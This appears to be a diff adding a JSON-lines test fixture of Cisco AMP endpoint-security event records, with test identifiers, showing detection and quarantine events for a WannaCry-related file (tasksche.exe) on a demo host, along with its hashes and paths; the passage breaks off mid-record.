+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867975","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867974","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867972","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":568000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835282","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":537000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835281","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":537000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835280","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":459000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204901661835279","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":443000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":100000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":69000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204901661835276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":6000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204897366867979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204897366867971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":975000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3060,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":897000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":796,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":850000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":726000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867975","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":694000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867974","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":632000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat 